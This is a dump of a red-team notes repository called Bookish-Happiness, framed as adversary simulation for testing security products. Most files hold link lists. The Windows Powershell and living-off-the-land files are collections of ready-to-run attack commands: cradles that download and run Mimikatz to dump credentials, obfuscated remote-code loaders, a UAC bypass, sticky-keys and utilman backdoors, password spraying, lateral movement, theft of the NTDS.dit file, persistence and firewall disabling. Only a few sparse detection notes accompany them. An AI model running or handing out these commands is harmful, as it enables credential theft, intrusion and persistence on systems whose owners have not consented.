├── Linux └── README.md ├── Network ├── domains.md └── README.md ├── Windows ├── README.md ├── sysinternals.md ├── mix.md ├── Bypass.md ├── Live off the Land.md └── Powershell.md ├── Mac └── README.md ├── Adversary └── README.md └── README.md /Linux/README.md: -------------------------------------------------------------------------------- 1 | # bookish-happiness 2 | 3 | # Linux 4 | -------------------------------------------------------------------------------- /Network/domains.md: -------------------------------------------------------------------------------- 1 | # Domains 2 | 3 | ## Dynamic DNS 4 | -------------------------------------------------------------------------------- /Windows/README.md: -------------------------------------------------------------------------------- 1 | # bookish-happiness 2 | 3 | # Windows 4 | -------------------------------------------------------------------------------- /Mac/README.md: -------------------------------------------------------------------------------- 1 | # bookish-happiness 2 | 3 | # Mac 4 | 5 | https://github.com/EmpireProject/EmPyre 6 | -------------------------------------------------------------------------------- /Adversary/README.md: -------------------------------------------------------------------------------- 1 | # bookish-happiness 2 | 3 | # Adversary 4 | 5 | https://github.com/Cyb3rWard0g/ThreatHunter-Playbook 6 | -------------------------------------------------------------------------------- /Windows/sysinternals.md: -------------------------------------------------------------------------------- 1 | # Sysinternals 2 | 3 | ## psexec.exe 4 | 5 | Input: 6 | 7 | code here 8 | 9 | Output: 10 | 11 | code here 12 | -------------------------------------------------------------------------------- /Windows/mix.md: -------------------------------------------------------------------------------- 1 | https://github.com/nccgroup/redsnarf 2 | 3 | http://beefproject.com 4 | 5 | https://github.com/trustedsec/social-engineer-toolkit 6 | 7 | 8 | https://github.com/Hack-with-Github 9 | 10 | https://github.com/bhdresh/CVE-2017-0199 11 | 12 | 13 | https://gist.github.com/subTee/c6bd1401504f9d4d52a0 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bookish-Happiness 2 | 3 | Bookish-Happiness is the adversary simulation project you really wanted. 4 | 5 | ## DISCLAIMER: 6 | 7 | Do not use these tools for evil. Please use these tools and its output responsibly and only on systems on which you have explicit permission to access and run code. 8 | 9 | ## References: 10 | 11 | http://pwnwiki.io/#!index.md 12 | 13 | https://youtu.be/Q5Fu6AvXi_A 14 | -------------------------------------------------------------------------------- /Network/README.md: -------------------------------------------------------------------------------- 1 | # bookish-happiness 2 | 3 | # Network 4 | 5 | ***PCAP replay*** 6 | 7 | I'm finding that PCAP replay may be the most effective way to properly test security appliances that promise to detect or prevent all the things 8 | 9 | 10 | ***Firewall*** 11 | 12 | [EgressBuster - TrustedSec](https://github.com/trustedsec/egressbuster) 13 | 14 | [Allports.Exposed - BHIS](https://www.blackhillsinfosec.com/?p=4811) 15 | 16 | [DNScat2-Powershell - BHIS](https://www.blackhillsinfosec.com/?p=5578&) 17 | 18 | Webshell Detection 19 | 20 | ***DLP*** 21 | 22 | 23 | ***Mail Gateway*** 24 | 25 | URL Rewrite 26 | 27 | Sandbox 28 | 29 | 30 | https://github.com/byt3bl33d3r?tab=repositories 31 | -------------------------------------------------------------------------------- /Windows/Bypass.md: -------------------------------------------------------------------------------- 1 | # Bypasses 2 | 3 | ## Application Whitelisting 4 | 5 | 6 | [Application Whitelist Auditor - Airlock Digital](https://www.airlockdigital.com/application-whitelisting-auditor/) 7 | 8 | [AllTheThings - SubTee](https://github.com/subTee/AllTheThings) 9 | 10 | [Bypass Techniques - SubTee](https://github.com/subTee/ApplicationWhitelistBypassTechniques) 11 | 12 | ## Native Utilities 13 | 14 | ### Reg.exe - On Screen Keyboard swap 15 | 16 | Create a registry entry on the host, allowing a system-level shell to be invoked any time that the osk.exe (on screen keyboard) process is called: 17 | 18 | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f 19 | 20 | Test: 21 | 22 | Logout of current session. Select the accessibility controls on the logon screen and click "On Screen Keyboard" 23 | 24 | Detection: 25 | 26 | Reg.exe add a process or a command shell. Much of it will be based on command line or actual registry key value add/changes. 27 | 28 | Utilman.exe spawning cmd.exe and detecting whatever other commands executed via cmdline (ex - net user jack pwnfish /add) 29 | 30 | 31 | ### Reg.exe - sethc.exe swap 32 | 33 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f 34 | 35 | ### Reg.exe - utilman.exe swap 36 | 37 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f 38 | 39 | ### Regsvr32 + sct file + powershell encoded command 40 | 41 | This is based on @SubTee sct bypass - https://github.com/subTee/SCTPersistence 42 | 43 | Test: 44 | 45 | regsvr32.exe /s https://gist.githubusercontent.com/MHaggis/31a1d0efd882d048436aeb7b9fd7f6d0/raw/b96dc20465abfeed3f05ba56b28e2ff91c398606/backdoor.sct 46 | 47 | Detection: 48 | 49 | ### Cscript spawn Calc 50 | 51 | Input: 52 | 53 | cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs blahblahahdfaldfdfjkdfkjkdkdkdkdkdkdkdkdkdkdkdkdkdkdkdkdkdkdkdkdkdkkdkdkddkdkdkdkdkdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd 54 | "script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct 55 | -------------------------------------------------------------------------------- /Windows/Live off the Land.md: -------------------------------------------------------------------------------- 1 | # Native - Living off the land 2 | 3 | Living off the land is using native operating system utilities to bypass controls in place. At most organizations, this will be AppWhitelisting, AV, endpoint detection software and so on. From the endpoint to the network, you should see some type of activity occur. If you have deep packet inspection, and a sct file is downloaded with powershell, did your network device detect or prevent this? Remember, this is to determine if your current controls are properly working as they were described to you. 4 | 5 | ## One Liners 6 | 7 | 8 | ## net.exe 9 | 10 | ### Password Spraying 11 | 12 | http://pwnwiki.io/#!privesc/windows/index.md#Password_Spraying 13 | 14 | net user /domain > DomainUsers.txt 15 | echo "Password1" >> pass.txt 16 | echo "1q2w3e4r" >> pass.txt 17 | 18 | For loop: 19 | 20 | @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL 21 | 22 | ## Reconnaissance 23 | 24 | ### Net user and group Enumeration 25 | 26 | Domain Group Enumeration: 27 | 28 | net groups "domain administrators" /domain 29 | 30 | Domain User Enumeration: 31 | 32 | net user /domain 33 | 34 | Local Group Enumeration: 35 | 36 | net localgroup "administrators" 37 | 38 | Local User Enumeration: 39 | 40 | net user 41 | 42 | Local user add: 43 | 44 | Net user /add Jack Pwndiddy1 45 | 46 | Add new user to localgroup: 47 | 48 | net localgroup administrators jack /add 49 | 50 | Local Share Enumeration: 51 | 52 | net Share 53 | 54 | Remote Share Enumeration: 55 | 56 | net share 57 | 58 | 59 | ## at.exe 60 | 61 | Note: deprecated in Windows 8+ 62 | 63 | ### Privileged Escalation 64 | 65 | This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system. 66 | 67 | http://pwnwiki.io/#!privesc/windows/index.md 68 | 69 | Input: 70 | 71 | at 13:20 /interactive cmd 72 | 73 | Example: 74 | 75 | net use \\[computername|IP] /user:DOMAIN\username password 76 | net time \\[computername|IP] 77 | at \\[computername|IP] 13:20 c:\temp\evil.bat 78 | 79 | ## schtask.exe 80 | 81 | ### Launch Interactive cmd.exe 82 | 83 | Input: 84 | 85 | SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 86 | 87 | 88 | ## reg.exe 89 | 90 | Input: 91 | 92 | code here 93 | 94 | Output: 95 | 96 | code here 97 | 98 | Examples: 99 | 100 | reg add hkcu\software\microsoft\windows\currentversion\run /v netshare /f /d %temp%\notilv.exe /t REG_EXPAND_SZ 101 | 102 | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ausMfTQVsuC /t REG_EXPAND_SZ /d "\"C:\Users\IEUser\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\IEUser\wBJLxnECLJF\FysHVwDWznz.ICgcjG\"" /f 103 | 104 | ## Netsh.exe 105 | 106 | http://pwnwiki.io/#!pivoting/windows/windows_cmd_network.md 107 | 108 | ### Firewall Control 109 | 110 | Input: 111 | 112 | netsh firewall set opmode [disable|enable] 113 | 114 | ### Netsh.exe Pivoting 115 | 116 | Input: 117 | 118 | netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 119 | 120 | Can also support v4tov6, v6tov6, and v6tov4 121 | 122 | ### Netsh.exe Sniffing 123 | 124 | Input: 125 | 126 | netsh trace start capture=yes overwrite=no tracefile= 127 | 128 | to stop: 129 | 130 | netsh trace stop 131 | 132 | ### Netsh.exe Wireless backdoor 133 | 134 | Input: 135 | 136 | netsh wlan set hostednetwork mode=[allow\|disallow] 137 | netsh wlan set hostednetwork ssid= key= keyUsage=persistent\|temporary 138 | netsh wlan [start|stop] hostednetwork 139 | 140 | Enables or disables hostednetwork service. 141 | Complete hosted network setup for creating a wireless backdoor. 142 | Starts or stops a wireless backdoor. See below to set it up. 143 | 144 | ## Regsvr32.exe 145 | 146 | Input: 147 | 148 | code here 149 | 150 | Output: 151 | 152 | code here 153 | 154 | regsvr32.exe /s /n /u /i:https:///data scrobj.dll 155 | 156 | ## waitfor.exe 157 | 158 | Input: 159 | 160 | code here 161 | 162 | Output: 163 | 164 | code here 165 | 166 | ## wmic.exe 167 | 168 | Provided by: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf 169 | 170 | 171 | ### Reconnaissance 172 | 173 | Input: 174 | 175 | wmic useraccount get /ALL 176 | 177 | Input: 178 | 179 | wmic process get caption,executablepath,commandline 180 | 181 | Input: 182 | 183 | wmic qfe get description,installedOn /format:csv 184 | 185 | Input: 186 | 187 | wmic /node:”192.168.0.1” service where (caption like “%sql server (%”) 188 | 189 | Input: 190 | 191 | get-wmiobject –class “win32_share” –namespace “root\CIMV2” –computer “targetname” 192 | 193 | ### Lateral Movement 194 | 195 | Input: 196 | 197 | wmic /node:REMOTECOMPUTERNAME process call create “COMMAND AND ARGUMENTS" 198 | 199 | Input: 200 | 201 | wmic /NODE: “192.168.0.1” process call create “evil.exe” 202 | 203 | ### Privileged Escalation 204 | 205 | Input: 206 | 207 | wmic /node:REMOTECOMPUTERNAME PROCESS call create “at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" 208 | 209 | Input: 210 | 211 | wmic /node:REMOTECOMPUTERNAME PROCESS call create “cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit“ 212 | 213 | ## bitsadmin.exe 214 | 215 | Input: 216 | 217 | bitsadmin.exe /transfer /Download http://bit.ly/L3g1tCrad1e Default_File_Path.ps1 218 | 219 | 220 | ## Installutil.exe 221 | 222 | Download the two binaries: 223 | 224 | Input for pshell.dll: 225 | 226 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U pshell.dll 227 | 228 | Input for rwxhunter.exe: 229 | 230 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U rwxhunter.exe 231 | 232 | ## Qwinsta 233 | 234 | Input: 235 | -------------------------------------------------------------------------------- /Windows/Powershell.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # Powershell 4 | 5 | Every product today reports they can prevent fileless, living off the land, nation state :all_the_things: . I say - prove it. 6 | 7 | http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html 8 | 9 | https://www.blackhillsinfosec.com/?p=5831 10 | 11 | ## One Liners 12 | 13 | ### Download Mimikatz and Dump credentials 14 | 15 | powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" 16 | 17 | ### Download Mimikatz and Dump credentials 18 | 19 | Just download it: 20 | 21 | (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) 22 | 23 | Minor obfuscation: 24 | 25 | (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() 26 | 27 | All obfuscation: 28 | 29 | Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) 30 | 31 | Mimikatz - Cradlecraft PsSendKeys 32 | 33 | $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr 34 | 35 | ### Invoke-AppPathBypass 36 | 37 | Note: Windows 10 only 38 | 39 | Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ 40 | 41 | Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass" 42 | 43 | At prompt, to test: 44 | 45 | C:\Windows\System32\cmd.exe 46 | 47 | ### Obfuscated Powershell 48 | 49 | Fancy obfuscation that reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" 50 | 51 | cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" 52 | 53 | Second test: 54 | 55 | cmd /c "set apple=fish (cars ('http://bit.ly/L3g1tCrad1e).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" 56 | 57 | ## Powershell Obfuscation 58 | 59 | Provided by @danielbohannon 60 | 61 | [Out-FINcodedCommand](https://github.com/danielbohannon/Out-FINcodedCommand/blob/master/README.md) 62 | 63 | 64 | Setup: 65 | 66 | Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/danielbohannon/Out-FINcodedCommand/master/Out-FINcodedCommand.ps1') 67 | 68 | Input: 69 | 70 | Out-FINcodedCommand -command "iex (iwr http://bit.ly/L3g1t).content" -FinalBinary powershell 71 | 72 | Follow prompts to create variables. 73 | 74 | Output: 75 | 76 | cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" 77 | 78 | 79 | 80 | [Invoke-CradleCrafter](https://github.com/danielbohannon/Invoke-CradleCrafter) 81 | 82 | Input: 83 | 84 | code here 85 | 86 | Output: 87 | 88 | code here 89 | 90 | [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) 91 | 92 | Input: 93 | 94 | code here 95 | 96 | Output: 97 | 98 | code here 99 | 100 | ## Powershell Kits 101 | 102 | ### Unicorn 103 | 104 | https://github.com/trustedsec/unicorn/blob/master/README.md 105 | 106 | ### Empire 107 | 108 | http://www.powershellempire.com/ 109 | 110 | ### Bloodhound 111 | 112 | https://github.com/BloodHoundAD/BloodHound 113 | 114 | ### GoFetch 115 | 116 | https://github.com/GoFetchAD/GoFetch 117 | 118 | ### Deathstar 119 | 120 | https://github.com/byt3bl33d3r/DeathStar 121 | 122 | https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html 123 | 124 | ### PowerSploit 125 | 126 | https://github.com/PowerShellMafia/PowerSploit 127 | 128 | ### Nishang 129 | 130 | https://github.com/samratashok/nishang 131 | 132 | ### PSAttack 133 | 134 | https://github.com/jaredhaight/PSAttack 135 | 136 | ### Dr0p1t-Framework 137 | 138 | https://github.com/D4Vinci/Dr0p1t-Framework 139 | 140 | ### PowerOPS 141 | 142 | https://github.com/fdiskyou/PowerOPS 143 | 144 | powershell.exe Copy ([PSObject].Assembly.Location) C:\ 145 | 146 | Then: 147 | 148 | csc.exe /unsafe /reference:"C:\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\ieuser\desktop\PowerOPS_x64.exe /platform:x64 "C:\Users\IEUser\Downloads\PowerOPS-1.0-beta\PowerOps\*.cs" 149 | 150 | ### Invoke-AutoIt 151 | 152 | https://github.com/byt3bl33d3r/Invoke-AutoIt 153 | 154 | Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/byt3bl33d3r/Invoke-AutoIt/master/Invoke-AutoIt.ps1'); Invoke-AutoIt -WindowTitle "Remote Desktop" -Keys "Rainbow Push-ups"" 155 | 156 | ### Invoke-Phant0m 157 | 158 | https://github.com/hlldz/Invoke-Phant0m 159 | 160 | Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://github.com/hlldz/Invoke-Phant0m/blob/master/Invoke-Phant0m.ps1'); Invoke-Phant0m" 161 | 162 | ### Download Minicars and Dump credentials (Mimikatz alternative) 163 | 164 | https://twitter.com/curi0usjack/status/883344872438104064 165 | 166 | https://gist.github.com/curi0usJack/adbf34bd402f28138388bd6e266da961 167 | 168 | powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" 169 | 170 | # Other 171 | 172 | ### DNScat2-powershell 173 | 174 | https://github.com/lukebaggett/dnscat2-powershell 175 | 176 | # Powershell 5.1 177 | 178 | The following requires Powershell 5.1: https://www.microsoft.com/en-us/download/details.aspx?id=54616 179 | 180 | Moar fun here: https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/ 181 | 182 | ## Add User 183 | 184 | New-LocalUser -FullName 'Jack Frost' -Name 'Jackfro' -Password PwnDiddy1 ‑Description 'Pwnage account' 185 | 186 | ## Create a group 187 | 188 | New-LocalGroup -Name 'Testgroup' -Description 'Testing group' 189 | --------------------------------------------------------------------------------